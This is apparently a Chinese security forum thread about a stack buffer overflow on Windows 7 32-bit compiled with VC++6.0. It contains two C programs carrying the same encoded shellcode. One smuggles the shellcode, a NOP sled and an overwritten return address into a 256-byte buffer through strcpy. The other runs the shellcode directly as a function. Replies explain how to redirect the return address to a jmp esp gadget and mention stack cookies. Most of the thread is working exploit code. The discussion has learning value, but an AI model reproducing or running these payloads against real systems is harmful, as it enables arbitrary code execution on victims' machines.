windows 7 sp1 32b位 vc++6.0 green
#include "stdio.h" #include "string.h" char name[] = "\xd9\xca\xbf\x19\xde\x0e\xc3\xd9\x74\x24\xf4\x5a\x33\xc9\xb1" "\x31\x31\x7a\x18\x03\x7a\x18\x83\xc2\x1d\x3c\xfb\x3f\xf5\x42" "\x04\xc0\x05\x23\x8c\x25\x34\x63\xea\x2e\x66\x53\x78\x62\x8a" "\x18\x2c\x97\x19\x6c\xf9\x98\xaa\xdb\xdf\x97\x2b\x77\x23\xb9" "\xaf\x8a\x70\x19\x8e\x44\x85\x58\xd7\xb9\x64\x08\x80\xb6\xdb" "\xbd\xa5\x83\xe7\x36\xf5\x02\x60\xaa\x4d\x24\x41\x7d\xc6\x7f" "\x41\x7f\x0b\xf4\xc8\x67\x48\x31\x82\x1c\xba\xcd\x15\xf5\xf3" "\x2e\xb9\x38\x3c\xdd\xc3\x7d\xfa\x3e\xb6\x77\xf9\xc3\xc1\x43" "\x80\x1f\x47\x50\x22\xeb\xff\xbc\xd3\x38\x99\x37\xdf\xf5\xed" "\x10\xc3\x08\x21\x2b\xff\x81\xc4\xfc\x76\xd1\xe2\xd8\xd3\x81" "\x8b\x79\xb9\x64\xb3\x9a\x62\xd8\x11\xd0\x8e\x0d\x28\xbb\xc4" "\xd0\xbe\xc1\xaa\xd3\xc0\xc9\x9a\xbb\xf1\x42\x75\xbb\x0d\x81" "\x32\x33\x44\x88\x12\xdc\x01\x58\x27\x81\xb1\xb6\x6b\xbc\x31" "\x33\x13\x3b\x29\x36\x16\x07\xed\xaa\x6a\x18\x98\xcc\xd9\x19" "\x89\xae\xbc\x89\x51\x1f\x5b\x2a\xf3\x5f" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90" "\x48\xfe\x12"; int main() { char buffer[256]; strcpy(buffer,name); printf("%s\n",buffer); getchar(); return 0; }
[课程]Android-CTF解题方法汇总!
BDBig 你的意思是原shellcode正常?你的shellcode。。。修正过函数吗
#include "stdio.h" #include "string.h" unsigned char shellcode[] = "\xd9\xca\xbf\x19\xde\x0e\xc3\xd9\x74\x24\xf4\x5a\x33\xc9\xb1" "\x31\x31\x7a\x18\x03\x7a\x18\x83\xc2\x1d\x3c\xfb\x3f\xf5\x42" "\x04\xc0\x05\x23\x8c\x25\x34\x63\xea\x2e\x66\x53\x78\x62\x8a" "\x18\x2c\x97\x19\x6c\xf9\x98\xaa\xdb\xdf\x97\x2b\x77\x23\xb9" "\xaf\x8a\x70\x19\x8e\x44\x85\x58\xd7\xb9\x64\x08\x80\xb6\xdb" "\xbd\xa5\x83\xe7\x36\xf5\x02\x60\xaa\x4d\x24\x41\x7d\xc6\x7f" "\x41\x7f\x0b\xf4\xc8\x67\x48\x31\x82\x1c\xba\xcd\x15\xf5\xf3" "\x2e\xb9\x38\x3c\xdd\xc3\x7d\xfa\x3e\xb6\x77\xf9\xc3\xc1\x43" "\x80\x1f\x47\x50\x22\xeb\xff\xbc\xd3\x38\x99\x37\xdf\xf5\xed" "\x10\xc3\x08\x21\x2b\xff\x81\xc4\xfc\x76\xd1\xe2\xd8\xd3\x81" "\x8b\x79\xb9\x64\xb3\x9a\x62\xd8\x11\xd0\x8e\x0d\x28\xbb\xc4" "\xd0\xbe\xc1\xaa\xd3\xc0\xc9\x9a\xbb\xf1\x42\x75\xbb\x0d\x81" "\x32\x33\x44\x88\x12\xdc\x01\x58\x27\x81\xb1\xb6\x6b\xbc\x31" "\x33\x13\x3b\x29\x36\x16\x07\xed\xaa\x6a\x18\x98\xcc\xd9\x19" "\x89\xae\xbc\x89\x51\x1f\x5b\x2a\xf3\x5f"; typedef void (__stdcall *CODE) (); void RunShellCode_2() { ((void(*)(void))&shellcode)(); } void main() { RunShellCode_2(); }
netwind 你要动态调试一下,用一处指向指令jmp esp的地址覆盖返回地址,然后函数返回时esp要指向shellcode才行。上面的代码函数返回时esp是不指向shellcode的
不对 好像C++的编译器都会自带栈值检测和栈的安全性检测,我记得好像是叫个Cookie的东西,所以,C++下想着函数溢出我不太了解,还是内联汇编吧